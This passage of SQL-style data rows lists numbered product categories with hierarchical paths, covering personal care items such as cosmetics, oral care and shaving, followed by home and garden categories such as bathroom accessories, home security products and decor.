(2762, 2762, 0, 'Health & Beauty > Personal Care > Cosmetics > Cosmetic Tools > Skin Care Tools > Skin Cleansing Brushes & Systems'),
(2763, 2763, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup'),
(2764, 2764, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Body Makeup'),
(2765, 2765, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Body Makeup > Body & Hair Glitter'),
(2766, 2766, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Body Makeup > Body Paint & Foundation'),
(2767, 2767, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Costume & Stage Makeup'),
(2768, 2768, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Eye Makeup'),
(2769, 2769, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Eye Makeup > Eye Primer'),
(2770, 2770, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Eye Makeup > Eye Shadow'),
(2771, 2771, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Eye Makeup > Eyebrow Enhancers'),
(2772, 2772, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Eye Makeup > Eyeliner'),
(2773, 2773, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Eye Makeup > False Eyelashes'),
(2774, 2774, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Eye Makeup > Lash & Brow Growth Treatments'),
(2775, 2775, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Eye Makeup > Mascara'),
(2776, 2776, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Eye Makeup > Mascara Primer'),
(2777, 2777, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Face Makeup'),
(2778, 2778, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Face Makeup > Blushes & Bronzers'),
(2779, 2779, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Face Makeup > Face Powder'),
(2780, 2780, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Face Makeup > Face Primer'),
(2781, 2781, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Face Makeup > Foundations & Concealers'),
(2782, 2782, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Face Makeup > Highlighters & Luminizers'),
(2783, 2783, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Lip Makeup'),
(2784, 2784, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Lip Makeup > Lip & Cheek Stains'),
(2785, 2785, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Lip Makeup > Lip Gloss'),
(2786, 2786, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Lip Makeup > Lip Liner'),
(2787, 2787, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Lip Makeup > Lip Primer'),
(2788, 2788, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Lip Makeup > Lipstick'),
(2789, 2789, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Makeup Finishing Sprays'),
(2790, 2790, 0, 'Health & Beauty > Personal Care > Cosmetics > Makeup > Temporary Tattoos'),
(2791, 2791, 0, 'Health & Beauty > Personal Care > Cosmetics > Nail Care'),
(2792, 2792, 0, 'Health & Beauty > Personal Care > Cosmetics > Nail Care > Cuticle Cream & Oil'),
(2793, 2793, 0, 'Health & Beauty > Personal Care > Cosmetics > Nail Care > False Nails'),
(2794, 2794, 0, 'Health & Beauty > Personal Care > Cosmetics > Nail Care > Manicure Glue'),
(2795, 2795, 0, 'Health & Beauty > Personal Care > Cosmetics > Nail Care > Nail Art Kits & Accessories'),
(2796, 2796, 0, 'Health & Beauty > Personal Care > Cosmetics > Nail Care > Nail Polish Drying Drops & Sprays'),
(2797, 2797, 0, 'Health & Beauty > Personal Care > Cosmetics > Nail Care > Nail Polish Removers'),
(2798, 2798, 0, 'Health & Beauty > Personal Care > Cosmetics > Nail Care > Nail Polish Thinners'),
(2799, 2799, 0, 'Health & Beauty > Personal Care > Cosmetics > Nail Care > Nail Polishes'),
(2800, 2800, 0, 'Health & Beauty > Personal Care > Cosmetics > Perfume & Cologne'),
(2801, 2801, 0, 'Health & Beauty > Personal Care > Cosmetics > Skin Care'),
(2802, 2802, 0, 'Health & Beauty > Personal Care > Cosmetics > Skin Care > Acne Treatments & Kits'),
(2803, 2803, 0, 'Health & Beauty > Personal Care > Cosmetics > Skin Care > Anti-Aging Skin Care Kits'),
(2804, 2804, 0, 'Health & Beauty > Personal Care > Cosmetics > Skin Care > Body Oil'),
(2805, 2805, 0, 'Health & Beauty > Personal Care > Cosmetics > Skin Care > Body Powder'),
(2806, 2806, 0, 'Health & Beauty > Personal Care > Cosmetics > Skin Care > Compressed Skin Care Mask Sheets'),
(2807, 2807, 0, 'Health & Beauty > Personal Care > Cosmetics > Skin Care > Facial Cleansers'),
(2808, 2808, 0, 'Health & Beauty > Personal Care > Cosmetics > Skin Care > Facial Cleansing Kits'),
(2809, 2809, 0, 'Health & Beauty > Personal Care > Cosmetics > Skin Care > Facial Pore Strips'),
(2810, 2810, 0, 'Health & Beauty > Personal Care > Cosmetics > Skin Care > Lip Balms & Treatments'),
(2811, 2811, 0, 'Health & Beauty > Personal Care > Cosmetics > Skin Care > Lotion & Moisturizer'),
(2812, 2812, 0, 'Health & Beauty > Personal Care > Cosmetics > Skin Care > Makeup Removers'),
(2813, 2813, 0, 'Health & Beauty > Personal Care > Cosmetics > Skin Care > Petroleum Jelly'),
(2814, 2814, 0, 'Health & Beauty > Personal Care > Cosmetics > Skin Care > Skin Care Masks & Peels'),
(2815, 2815, 0, 'Health & Beauty > Personal Care > Cosmetics > Skin Care > Skin Insect Repellent'),
(2816, 2816, 0, 'Health & Beauty > Personal Care > Cosmetics > Skin Care > Sunscreen'),
(2817, 2817, 0, 'Health & Beauty > Personal Care > Cosmetics > Skin Care > Tanning Products'),
(2818, 2818, 0, 'Health & Beauty > Personal Care > Cosmetics > Skin Care > Tanning Products > Self Tanner'),
(2819, 2819, 0, 'Health & Beauty > Personal Care > Cosmetics > Skin Care > Tanning Products > Tanning Oil & Lotion'),
(2820, 2820, 0, 'Health & Beauty > Personal Care > Cosmetics > Skin Care > Toners & Astringents'),
(2821, 2821, 0, 'Health & Beauty > Personal Care > Cosmetics > Skin Care > Wart Removers'),
(2822, 2822, 0, 'Health & Beauty > Personal Care > Cotton Balls'),
(2823, 2823, 0, 'Health & Beauty > Personal Care > Cotton Swabs'),
(2824, 2824, 0, 'Health & Beauty > Personal Care > Deodorant & Anti-Perspirant'),
(2825, 2825, 0, 'Health & Beauty > Personal Care > Ear Care'),
(2826, 2826, 0, 'Health & Beauty > Personal Care > Ear Care > Ear Candles'),
(2827, 2827, 0, 'Health & Beauty > Personal Care > Ear Care > Ear Drops'),
(2828, 2828, 0, 'Health & Beauty > Personal Care > Ear Care > Ear Dryers'),
(2829, 2829, 0, 'Health & Beauty > Personal Care > Ear Care > Ear Picks & Spoons'),
(2830, 2830, 0, 'Health & Beauty > Personal Care > Ear Care > Ear Syringes'),
(2831, 2831, 0, 'Health & Beauty > Personal Care > Ear Care > Ear Wax Removal Kits'),
(2832, 2832, 0, 'Health & Beauty > Personal Care > Ear Care > Earplug Dispensers'),
(2833, 2833, 0, 'Health & Beauty > Personal Care > Ear Care > Earplugs'),
(2834, 2834, 0, 'Health & Beauty > Personal Care > Enema Kits & Supplies'),
(2835, 2835, 0, 'Health & Beauty > Personal Care > Feminine Sanitary Supplies'),
(2836, 2836, 0, 'Health & Beauty > Personal Care > Feminine Sanitary Supplies > Feminine Deodorant'),
(2837, 2837, 0, 'Health & Beauty > Personal Care > Feminine Sanitary Supplies > Feminine Douches & Creams'),
(2838, 2838, 0, 'Health & Beauty > Personal Care > Feminine Sanitary Supplies > Feminine Pads & Protectors'),
(2839, 2839, 0, 'Health & Beauty > Personal Care > Feminine Sanitary Supplies > Menstrual Cups'),
(2840, 2840, 0, 'Health & Beauty > Personal Care > Feminine Sanitary Supplies > Tampons'),
(2841, 2841, 0, 'Health & Beauty > Personal Care > Foot Care'),
(2842, 2842, 0, 'Health & Beauty > Personal Care > Foot Care > Bunion Care Supplies'),
(2843, 2843, 0, 'Health & Beauty > Personal Care > Foot Care > Corn & Callus Care Supplies'),
(2844, 2844, 0, 'Health & Beauty > Personal Care > Foot Care > Foot Odor Removers'),
(2845, 2845, 0, 'Health & Beauty > Personal Care > Foot Care > Insoles & Inserts'),
(2846, 2846, 0, 'Health & Beauty > Personal Care > Foot Care > Toe Spacers'),
(2847, 2847, 0, 'Health & Beauty > Personal Care > Hair Care'),
(2848, 2848, 0, 'Health & Beauty > Personal Care > Hair Care > Hair Care Kits'),
(2849, 2849, 0, 'Health & Beauty > Personal Care > Hair Care > Hair Color'),
(2850, 2850, 0, 'Health & Beauty > Personal Care > Hair Care > Hair Color Removers'),
(2851, 2851, 0, 'Health & Beauty > Personal Care > Hair Care > Hair Coloring Accessories'),
(2852, 2852, 0, 'Health & Beauty > Personal Care > Hair Care > Hair Loss Concealers'),
(2853, 2853, 0, 'Health & Beauty > Personal Care > Hair Care > Hair Loss Treatments'),
(2854, 2854, 0, 'Health & Beauty > Personal Care > Hair Care > Hair Permanents & Straighteners'),
(2855, 2855, 0, 'Health & Beauty > Personal Care > Hair Care > Hair Shears'),
(2856, 2856, 0, 'Health & Beauty > Personal Care > Hair Care > Hair Steamers & Heat Caps'),
(2857, 2857, 0, 'Health & Beauty > Personal Care > Hair Care > Hair Styling Products'),
(2858, 2858, 0, 'Health & Beauty > Personal Care > Hair Care > Hair Styling Tool Accessories'),
(2859, 2859, 0, 'Health & Beauty > Personal Care > Hair Care > Hair Styling Tool Accessories > Hair Curler Clips & Pins'),
(2860, 2860, 0, 'Health & Beauty > Personal Care > Hair Care > Hair Styling Tool Accessories > Hair Dryer Accessories'),
(2861, 2861, 0, 'Health & Beauty > Personal Care > Hair Care > Hair Styling Tool Accessories > Hair Iron Accessories'),
(2862, 2862, 0, 'Health & Beauty > Personal Care > Hair Care > Hair Styling Tools'),
(2863, 2863, 0, 'Health & Beauty > Personal Care > Hair Care > Hair Styling Tools > Combs & Brushes'),
(2864, 2864, 0, 'Health & Beauty > Personal Care > Hair Care > Hair Styling Tools > Curling Irons'),
(2865, 2865, 0, 'Health & Beauty > Personal Care > Hair Care > Hair Styling Tools > Hair Curlers'),
(2866, 2866, 0, 'Health & Beauty > Personal Care > Hair Care > Hair Styling Tools > Hair Dryers'),
(2867, 2867, 0, 'Health & Beauty > Personal Care > Hair Care > Hair Styling Tools > Hair Straighteners'),
(2868, 2868, 0, 'Health & Beauty > Personal Care > Hair Care > Hair Styling Tools > Hair Styling Tool Sets'),
(2869, 2869, 0, 'Health & Beauty > Personal Care > Hair Care > Shampoo & Conditioner'),
(2870, 2870, 0, 'Health & Beauty > Personal Care > Massage & Relaxation'),
(2871, 2871, 0, 'Health & Beauty > Personal Care > Massage & Relaxation > Back Scratchers'),
(2872, 2872, 0, 'Health & Beauty > Personal Care > Massage & Relaxation > Eye Pillows'),
(2873, 2873, 0, 'Health & Beauty > Personal Care > Massage & Relaxation > Massage Chairs'),
(2874, 2874, 0, 'Health & Beauty > Personal Care > Massage & Relaxation > Massage Oil'),
(2875, 2875, 0, 'Health & Beauty > Personal Care > Massage & Relaxation > Massage Stone Warmers'),
(2876, 2876, 0, 'Health & Beauty > Personal Care > Massage & Relaxation > Massage Stones'),
(2877, 2877, 0, 'Health & Beauty > Personal Care > Massage & Relaxation > Massage Tables'),
(2878, 2878, 0, 'Health & Beauty > Personal Care > Massage & Relaxation > Massagers'),
(2879, 2879, 0, 'Health & Beauty > Personal Care > Oral Care'),
(2880, 2880, 0, 'Health & Beauty > Personal Care > Oral Care > Breath Spray'),
(2881, 2881, 0, 'Health & Beauty > Personal Care > Oral Care > Dental Floss'),
(2882, 2882, 0, 'Health & Beauty > Personal Care > Oral Care > Dental Mouthguards'),
(2883, 2883, 0, 'Health & Beauty > Personal Care > Oral Care > Dental Water Jet Replacement Tips'),
(2884, 2884, 0, 'Health & Beauty > Personal Care > Oral Care > Dental Water Jets'),
(2885, 2885, 0, 'Health & Beauty > Personal Care > Oral Care > Denture Adhesives'),
(2886, 2886, 0, 'Health & Beauty > Personal Care > Oral Care > Denture Cleaners'),
(2887, 2887, 0, 'Health & Beauty > Personal Care > Oral Care > Denture Repair Kits'),
(2888, 2888, 0, 'Health & Beauty > Personal Care > Oral Care > Dentures'),
(2889, 2889, 0, 'Health & Beauty > Personal Care > Oral Care > Gum Stimulators'),
(2890, 2890, 0, 'Health & Beauty > Personal Care > Oral Care > Mouthwash'),
(2891, 2891, 0, 'Health & Beauty > Personal Care > Oral Care > Orthodontic Appliance Cases'),
(2892, 2892, 0, 'Health & Beauty > Personal Care > Oral Care > Power Flossers'),
(2893, 2893, 0, 'Health & Beauty > Personal Care > Oral Care > Teeth Whiteners'),
(2894, 2894, 0, 'Health & Beauty > Personal Care > Oral Care > Tongue Scrapers'),
(2895, 2895, 0, 'Health & Beauty > Personal Care > Oral Care > Toothbrush Accessories'),
(2896, 2896, 0, 'Health & Beauty > Personal Care > Oral Care > Toothbrush Accessories > Toothbrush Covers'),
(2897, 2897, 0, 'Health & Beauty > Personal Care > Oral Care > Toothbrush Accessories > Toothbrush Replacement Heads'),
(2898, 2898, 0, 'Health & Beauty > Personal Care > Oral Care > Toothbrush Accessories > Toothbrush Sanitizers'),
(2899, 2899, 0, 'Health & Beauty > Personal Care > Oral Care > Toothbrushes'),
(2900, 2900, 0, 'Health & Beauty > Personal Care > Oral Care > Toothpaste'),
(2901, 2901, 0, 'Health & Beauty > Personal Care > Oral Care > Toothpaste Squeezers & Dispensers'),
(2902, 2902, 0, 'Health & Beauty > Personal Care > Oral Care > Toothpicks'),
(2903, 2903, 0, 'Health & Beauty > Personal Care > Personal Lubricants'),
(2904, 2904, 0, 'Health & Beauty > Personal Care > Shaving & Grooming'),
(2905, 2905, 0, 'Health & Beauty > Personal Care > Shaving & Grooming > Aftershave'),
(2906, 2906, 0, 'Health & Beauty > Personal Care > Shaving & Grooming > Body & Facial Hair Bleach'),
(2907, 2907, 0, 'Health & Beauty > Personal Care > Shaving & Grooming > Electric Razor Accessories'),
(2908, 2908, 0, 'Health & Beauty > Personal Care > Shaving & Grooming > Electric Razors'),
(2909, 2909, 0, 'Health & Beauty > Personal Care > Shaving & Grooming > Hair Clipper & Trimmer Accessories'),
(2910, 2910, 0, 'Health & Beauty > Personal Care > Shaving & Grooming > Hair Clippers & Trimmers'),
(2911, 2911, 0, 'Health & Beauty > Personal Care > Shaving & Grooming > Hair Removal'),
(2912, 2912, 0, 'Health & Beauty > Personal Care > Shaving & Grooming > Hair Removal > Depilatories'),
(2913, 2913, 0, 'Health & Beauty > Personal Care > Shaving & Grooming > Hair Removal > Electrolysis Devices'),
(2914, 2914, 0, 'Health & Beauty > Personal Care > Shaving & Grooming > Hair Removal > Epilators'),
(2915, 2915, 0, 'Health & Beauty > Personal Care > Shaving & Grooming > Hair Removal > Hair Removal Wax Warmers'),
(2916, 2916, 0, 'Health & Beauty > Personal Care > Shaving & Grooming > Hair Removal > Laser & IPL Hair Removal Devices'),
(2917, 2917, 0, 'Health & Beauty > Personal Care > Shaving & Grooming > Hair Removal > Waxing Kits & Supplies'),
(2918, 2918, 0, 'Health & Beauty > Personal Care > Shaving & Grooming > Razors & Razor Blades'),
(2919, 2919, 0, 'Health & Beauty > Personal Care > Shaving & Grooming > Shaving Bowls & Mugs'),
(2920, 2920, 0, 'Health & Beauty > Personal Care > Shaving & Grooming > Shaving Brushes'),
(2921, 2921, 0, 'Health & Beauty > Personal Care > Shaving & Grooming > Shaving Cream'),
(2922, 2922, 0, 'Health & Beauty > Personal Care > Shaving & Grooming > Shaving Kits'),
(2923, 2923, 0, 'Health & Beauty > Personal Care > Shaving & Grooming > Styptic Pencils'),
(2924, 2924, 0, 'Health & Beauty > Personal Care > Sleeping Aids'),
(2925, 2925, 0, 'Health & Beauty > Personal Care > Sleeping Aids > Eye Masks'),
(2926, 2926, 0, 'Health & Beauty > Personal Care > Sleeping Aids > Snoring & Sleep Apnea Aids'),
(2927, 2927, 0, 'Health & Beauty > Personal Care > Sleeping Aids > Travel Pillows'),
(2928, 2928, 0, 'Health & Beauty > Personal Care > Sleeping Aids > White Noise Machines'),
(2929, 2929, 0, 'Health & Beauty > Personal Care > Spray Tanning Tents'),
(2930, 2930, 0, 'Health & Beauty > Personal Care > Tanning Beds'),
(2931, 2931, 0, 'Health & Beauty > Personal Care > Tweezers'),
(2932, 2932, 0, 'Health & Beauty > Personal Care > Vision Care'),
(2933, 2933, 0, 'Health & Beauty > Personal Care > Vision Care > Contact Lens Care'),
(2934, 2934, 0, 'Health & Beauty > Personal Care > Vision Care > Contact Lens Care > Contact Lens Care Kits'),
(2935, 2935, 0, 'Health & Beauty > Personal Care > Vision Care > Contact Lens Care > Contact Lens Cases'),
(2936, 2936, 0, 'Health & Beauty > Personal Care > Vision Care > Contact Lens Care > Contact Lens Solution'),
(2937, 2937, 0, 'Health & Beauty > Personal Care > Vision Care > Contact Lenses'),
(2938, 2938, 0, 'Health & Beauty > Personal Care > Vision Care > Eye Drops & Lubricants'),
(2939, 2939, 0, 'Health & Beauty > Personal Care > Vision Care > Eyeglass Lenses'),
(2940, 2940, 0, 'Health & Beauty > Personal Care > Vision Care > Eyeglasses'),
(2941, 2941, 0, 'Health & Beauty > Personal Care > Vision Care > Eyewear Accessories'),
(2942, 2942, 0, 'Health & Beauty > Personal Care > Vision Care > Eyewear Accessories > Eyewear Cases & Holders'),
(2943, 2943, 0, 'Health & Beauty > Personal Care > Vision Care > Eyewear Accessories > Eyewear Lens Cleaning Solutions'),
(2944, 2944, 0, 'Health & Beauty > Personal Care > Vision Care > Eyewear Accessories > Eyewear Straps & Chains'),
(2945, 2945, 0, 'Health & Beauty > Personal Care > Vision Care > Sunglass Lenses'),
(2946, 2946, 0, 'Home & Garden'),
(2947, 2947, 0, 'Home & Garden > Bathroom Accessories'),
(2948, 2948, 0, 'Home & Garden > Bathroom Accessories > Bath Caddies'),
(2949, 2949, 0, 'Home & Garden > Bathroom Accessories > Bath Mats & Rugs'),
(2950, 2950, 0, 'Home & Garden > Bathroom Accessories > Bath Pillows'),
(2951, 2951, 0, 'Home & Garden > Bathroom Accessories > Bathroom Accessory Mounts'),
(2952, 2952, 0, 'Home & Garden > Bathroom Accessories > Bathroom Accessory Sets'),
(2953, 2953, 0, 'Home & Garden > Bathroom Accessories > Facial Tissue Holders'),
(2954, 2954, 0, 'Home & Garden > Bathroom Accessories > Hand Dryer Accessories'),
(2955, 2955, 0, 'Home & Garden > Bathroom Accessories > Hand Dryers'),
(2956, 2956, 0, 'Home & Garden > Bathroom Accessories > Medicine Cabinets'),
(2957, 2957, 0, 'Home & Garden > Bathroom Accessories > Robe Hooks'),
(2958, 2958, 0, 'Home & Garden > Bathroom Accessories > Safety Grab Bars'),
(2959, 2959, 0, 'Home & Garden > Bathroom Accessories > Shower Curtain Rings'),
(2960, 2960, 0, 'Home & Garden > Bathroom Accessories > Shower Curtains'),
(2961, 2961, 0, 'Home & Garden > Bathroom Accessories > Shower Rods'),
(2962, 2962, 0, 'Home & Garden > Bathroom Accessories > Soap & Lotion Dispensers'),
(2963, 2963, 0, 'Home & Garden > Bathroom Accessories > Soap Dishes & Holders'),
(2964, 2964, 0, 'Home & Garden > Bathroom Accessories > Toilet Brush Replacement Heads'),
(2965, 2965, 0, 'Home & Garden > Bathroom Accessories > Toilet Brushes & Holders'),
(2966, 2966, 0, 'Home & Garden > Bathroom Accessories > Toilet Paper Holders'),
(2967, 2967, 0, 'Home & Garden > Bathroom Accessories > Toothbrush Holders'),
(2968, 2968, 0, 'Home & Garden > Bathroom Accessories > Towel Racks & Holders'),
(2969, 2969, 0, 'Home & Garden > Business & Home Security'),
(2970, 2970, 0, 'Home & Garden > Business & Home Security > Dummy Surveillance Cameras'),
(2971, 2971, 0, 'Home & Garden > Business & Home Security > Home Alarm Systems'),
(2972, 2972, 0, 'Home & Garden > Business & Home Security > Motion Sensors'),
(2973, 2973, 0, 'Home & Garden > Business & Home Security > Safety & Security Mirrors'),
(2974, 2974, 0, 'Home & Garden > Business & Home Security > Security Lights'),
(2975, 2975, 0, 'Home & Garden > Business & Home Security > Security Monitors & Recorders'),
(2976, 2976, 0, 'Home & Garden > Business & Home Security > Security Safe Accessories'),
(2977, 2977, 0, 'Home & Garden > Business & Home Security > Security Safes'),
(2978, 2978, 0, 'Home & Garden > Business & Home Security > Security System Sensors'),
(2979, 2979, 0, 'Home & Garden > Decor'),
(2980, 2980, 0, 'Home & Garden > Decor > Address Signs'),
(2981, 2981, 0, 'Home & Garden > Decor > Artificial Flora'),
(2982, 2982, 0, 'Home & Garden > Decor > Artificial Food'),
(2983, 2983, 0, 'Home & Garden > Decor > Artwork'),
(2984, 2984, 0, 'Home & Garden > Decor > Artwork > Decorative Tapestries'),
(2985, 2985, 0, 'Home & Garden > Decor > Artwork > Posters, Prints, & Visual Artwork'),
(2986, 2986, 0, 'Home & Garden > Decor > Artwork > Sculptures & Statues'),
(2987, 2987, 0, 'Home & Garden > Decor > Backrest Pillows'),
(2988, 2988, 0, 'Home & Garden > Decor > Baskets'),
(2989, 2989, 0, 'Home & Garden > Decor > Bird & Wildlife Feeder Accessories'),
(2990, 2990, 0, 'Home & Garden > Decor > Bird & Wildlife Feeders'),
(2991, 2991, 0, 'Home & Garden > Decor > Bird & Wildlife Feeders > Bird Feeders'),
(2992, 2992, 0, 'Home & Garden > Decor > Bird & Wildlife Feeders > Butterfly Feeders'),
(2993, 2993, 0, 'Home & Garden > Decor > Bird & Wildlife Feeders > Squirrel Feeders'),
(2994, 2994, 0, 'Home & Garden > Decor > Bird & Wildlife House Accessories'),
(2995, 2995, 0, 'Home & Garden > Decor > Bird & Wildlife Houses'),
(2996, 2996, 0, 'Home & Garden > Decor > Bird & Wildlife Houses > Bat Houses'),
(2997, 2997, 0, 'Home & Garden > Decor > Bird & Wildlife Houses > Birdhouses'),
(2998, 2998, 0, 'Home & Garden > Decor > Bird & Wildlife Houses > Butterfly Houses'),
(2999, 2999, 0, 'Home & Garden > Decor > Bird Baths'),
(3000, 3000, 0, 'Home & Garden > Decor > Bookends'),
(3001, 3001, 0, 'Home & Garden > Decor > Cardboard Cutouts'),
(3002, 3002, 0, 'Home & Garden > Decor > Chair & Sofa Cushions'),
(3003, 3003, 0, 'Home & Garden > Decor > Clock Parts'),
(3004, 3004, 0, 'Home & Garden > Decor > Clocks'),
(3005, 3005, 0, 'Home & Garden > Decor > Clocks > Alarm Clocks'),
(3006, 3006, 0, 'Home & Garden > Decor > Clocks > Desk & Shelf Clocks'),
(3007, 3007, 0, 'Home & Garden > Decor > Clocks > Floor & Grandfather Clocks'),
(3008, 3008, 0, 'Home & Garden > Decor > Clocks > Wall Clocks'),
(3009, 3009, 0, 'Home & Garden > Decor > Coat & Hat Racks'),
(3010, 3010, 0, 'Home & Garden > Decor > Decorative Bells'),
(3011, 3011, 0, 'Home & Garden > Decor > Decorative Bottles'),
(3012, 3012, 0, 'Home & Garden > Decor > Decorative Bowls'),
(3013, 3013, 0, 'Home & Garden > Decor > Decorative Jars'),
(3014, 3014, 0, 'Home & Garden > Decor > Decorative Plaques'),
(3015, 3015, 0, 'Home & Garden > Decor > Decorative Plates'),
(3016, 3016, 0, 'Home & Garden > Decor > Decorative Trays'),
(3017, 3017, 0, 'Home & Garden > Decor > Door Mats'),
(3018, 3018, 0, 'Home & Garden > Decor > Dreamcatchers'),
(3019, 3019, 0, 'Home & Garden > Decor > Dried Flowers'),
(3020, 3020, 0, 'Home & Garden > Decor > Ecospheres'),
(3021, 3021, 0, 'Home & Garden > Decor > Figurines'),
(3022, 3022, 0, 'Home & Garden > Decor > Finials'),
(3023, 3023, 0, 'Home & Garden > Decor > Flag & Windsock Accessories'),
(3024, 3024, 0, 'Home & Garden > Decor > Flag & Windsock Accessories > Flag & Windsock Pole Lights'),
(3025, 3025, 0, 'Home & Garden > Decor > Flag & Windsock Accessories > Flag & Windsock Pole Mounting Hardware & Kits'),
(3026, 3026, 0, 'Home & Garden > Decor > Flag & Windsock Accessories > Flag & Windsock Poles'),
(3027, 3027, 0, 'Home & Garden > Decor > Flags & Windsocks'),
(3028, 3028, 0, 'Home & Garden > Decor > Flameless Candles'),
(3029, 3029, 0, 'Home & Garden > Decor > Fountains & Ponds'),
(3030, 3030, 0, 'Home & Garden > Decor > Fountains & Ponds > Fountain & Pond Accessories'),
(3031, 3031, 0, 'Home & Garden > Decor > Fountains & Ponds > Fountains & Waterfalls'),
(3032, 3032, 0, 'Home & Garden > Decor > Fountains & Ponds > Ponds'),
(3033, 3033, 0, 'Home & Garden > Decor > Garden & Stepping Stones'),
(3034, 3034, 0, 'Home & Garden > Decor > Growth Charts'),
(3035, 3035, 0, 'Home & Garden > Decor > Home Decor Decals'),
(3036, 3036, 0, 'Home & Garden > Decor > Home Fragrance Accessories'),
(3037, 3037, 0, 'Home & Garden > Decor > Home Fragrance Accessories > Candle & Oil Warmers'),
(3038, 3038, 0, 'Home & Garden > Decor > Home Fragrance Accessories > Candle Holders'),
(3039, 3039, 0, 'Home & Garden > Decor > Home Fragrance Accessories > Candle Snuffers'),
(3040, 3040, 0, 'Home & Garden > Decor > Home Fragrance Accessories > Incense Holders'),
(3041, 3041, 0, 'Home & Garden > Decor > Home Fragrances'),
(3042, 3042, 0, 'Home & Garden > Decor > Home Fragrances > Air Fresheners'),
(3043, 3043, 0, 'Home & Garden > Decor > Home Fragrances > Candles'),
(3044, 3044, 0, 'Home & Garden > Decor > Home Fragrances > Fragrance Oil'),
(3045, 3045, 0, 'Home & Garden > Decor > Home Fragrances > Incense'),
(3046, 3046, 0, 'Home & Garden > Decor > Home Fragrances > Potpourri'),
(3047, 3047, 0, 'Home & Garden > Decor > Home Fragrances > Wax Tarts'),
(3048, 3048, 0, 'Home & Garden > Decor > Hourglasses'),
(3049, 3049, 0, 'Home & Garden > Decor > House Numbers & Letters'),
(3050, 3050, 0, 'Home & Garden > Decor > Lawn Ornaments & Garden Sculptures'),
(3051, 3051, 0, 'Home & Garden > Decor > Mail Slots'),
(3052, 3052, 0, 'Home & Garden > Decor > Mailbox Accessories'),
(3053, 3053, 0, 'Home & Garden > Decor > Mailbox Accessories > Mailbox Covers'),
(3054, 3054, 0, 'Home & Garden > Decor > Mailbox Accessories > Mailbox Enclosures'),
(3055, 3055, 0, 'Home & Garden > Decor > Mailbox Accessories > Mailbox Flags'),
(3056, 3056, 0, 'Home & Garden > Decor > Mailbox Accessories > Mailbox Posts'),
(3057, 3057, 0, 'Home & Garden > Decor > Mailbox Accessories > Mailbox Replacement Doors'),
(3058, 3058, 0, 'Home & Garden > Decor > Mailboxes'),
(3059, 3059, 0, 'Home & Garden > Decor > Mirrors'),
(3060, 3060, 0, 'Home & Garden > Decor > Music Boxes'),
(3061, 3061, 0, 'Home & Garden > Decor > Napkin Rings'),
(3062, 3062, 0, 'Home & Garden > Decor > Novelty Signs'),
(3063, 3063, 0, 'Home & Garden > Decor > Ottoman Cushions'),
(3064, 3064, 0, 'Home & Garden > Decor > Picture Frames'),
(3065, 3065, 0, 'Home & Garden > Decor > Piggy Banks & Money Jars'),
(3066, 3066, 0, 'Home & Garden > Decor > Rain Chains'),
(3067, 3067, 0, 'Home & Garden > Decor > Rain Gauges'),
(3068, 3068, 0, 'Home & Garden > Decor > Refrigerator Magnets'),
(3069, 3069, 0, 'Home & Garden > Decor > Rugs'),
(3070, 3070, 0, 'Home & Garden > Decor > Seasonal & Holiday Decorations'),
(3071, 3071, 0, 'Home & Garden > Decor > Seasonal & Holiday Decorations > Advent Calendars'),
(3072, 3072, 0, 'Home & Garden > Decor > Seasonal & Holiday Decorations > Christmas Tree Skirts'),
(3073, 3073, 0, 'Home & Garden > Decor > Seasonal & Holiday Decorations > Christmas Tree Stands'),
(3074, 3074, 0, 'Home & Garden > Decor > Seasonal & Holiday Decorations > Easter Egg Decorating Kits'),
(3075, 3075, 0, 'Home & Garden > Decor > Seasonal & Holiday Decorations > Holiday Ornament Displays & Stands'),
(3076, 3076, 0, 'Home & Garden > Decor > Seasonal & Holiday Decorations > Holiday Ornament Hooks'),
(3077, 3077, 0, 'Home & Garden > Decor > Seasonal & Holiday Decorations > Holiday Ornaments'),
(3078, 3078, 0, 'Home & Garden > Decor > Seasonal & Holiday Decorations > Holiday Stocking Hangers'),
(3079, 3079, 0, 'Home & Garden > Decor > Seasonal & Holiday Decorations > Holiday Stockings'),
(3080, 3080, 0, 'Home & Garden > Decor > Seasonal & Holiday Decorations > Japanese Traditional Dolls'),
(3081, 3081, 0, 'Home & Garden > Decor > Seasonal & Holiday Decorations > Nativity Sets'),
(3082, 3082, 0, 'Home & Garden > Decor > Seasonal & Holiday Decorations > Seasonal Village Sets & Accessories'),
(3083, 3083, 0, 'Home & Garden > Decor > Shadow Boxes'),
(3084, 3084, 0, 'Home & Garden > Decor > Slipcovers'),
(3085, 3085, 0, 'Home & Garden > Decor > Snow Globes'),
(3086, 3086, 0, 'Home & Garden > Decor > Suncatchers'),
(3087, 3087, 0, 'Home & Garden > Decor > Sundials'),
(3088, 3088, 0, 'Home & Garden > Decor > Throw Pillows'),
(3089, 3089, 0, 'Home & Garden > Decor > Trunks'),
(3090, 3090, 0, 'Home & Garden > Decor > Vase Fillers & Table Scatters'),
(3091, 3091, 0, 'Home & Garden > Decor > Vases'),
(3092, 3092, 0, 'Home & Garden > Decor > Wallpaper'),
